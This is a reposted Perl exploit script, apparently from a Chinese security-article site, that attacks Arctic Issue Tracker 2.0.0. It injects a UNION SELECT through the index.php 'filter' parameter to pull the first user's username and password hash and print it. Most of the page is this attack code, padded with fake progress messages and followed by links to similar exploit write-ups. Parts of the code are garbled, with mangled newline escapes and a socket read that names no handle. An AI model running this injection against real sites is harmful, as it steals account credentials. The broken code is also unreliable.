Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

摘要：#!/usr/bin/perluseIO::Socket;printq{----------------------------------...

#!/usr/bin/perluse IO::Socket;

print q{

-----------------------------------------------

Arctic Issue Tracker v2.0.0 exploit by ldma

~ SubCode ~

use: arctic.pl [server] [dir]

sample:

$perl arctic.pl localhost /arctic/

-----------------------------------------------};$webpage = $ARGV[0];

$directory = $ARGV[1];

print " -initiatingn";

print "|--modules..OK!n";

sleep 1;

print "|--premodules..OK!n";

sleep 1;

print "|--preprocessors..OK!n";

sleep 1;

print " -opening channel.. OK!n";

sleep 2;

print "--------------------------------------------n";

print "~ configuration complete.. OK!n";

print "~ scanning";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

if (!$webpage) { die " rtfm geekn"; }$wbb_dir =

"".$webpage.$directory."index.php?filter=-1 union select 1,2,3,concat(username,0x3a,password),5 from arctic_user where id=1--";print "~ connecting";

$|=1;

foreach (1..1) {

print ".";

sleep 1;

}

print " OK!n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[ ] Can't connect to Servern";print "~ open exploiting-tree";

$|=1;

foreach (1..2) {

print ".";

sleep 1;

}

print " OK!n";

print $sock "GET $wbb_dir HTTP/1.1n";

print $sock "Accept: */*n";

print $sock "User-Agent: Hackern";

print $sock "Host: $webpagen";

print $sock "Connection: closenn";

print "[ ] Target: $webpagen";

while ($answer = ) {

if ($answer =~ /Current Filter: (.*)/) {

print "exploiting in progress";

$|=1;

foreach (1..3) {

print "...";

sleep 1;

}

print "OK!n[ ] vuln: OK!nnnwell done, ldma!nn";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

print "[ ] USER-ID: -1n";

print "[ ] ID-HASH: $1n";

print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~n";

exit();

}

}close($sock);# ldma

【Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit】相关文章：

★ nginx+cgi解析php容易出现的漏洞的分析

★ CoolPlayer m3u File Local Buffer Overflow Exploit

★ WEB应用脆弱性防止策略常见的16种WEB攻击以及解决方案

★ 如何处理ARP的攻击技巧

★ gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

★ php挖洞基础知识篇以及防范方法

★ phpDatingClub (website.php page) Local File Inclusion Vulnerability

★ File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities

★ eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit

★ AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit

上一篇： MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

下一篇： Mcafee scan 自动停止的修复方法

学习工具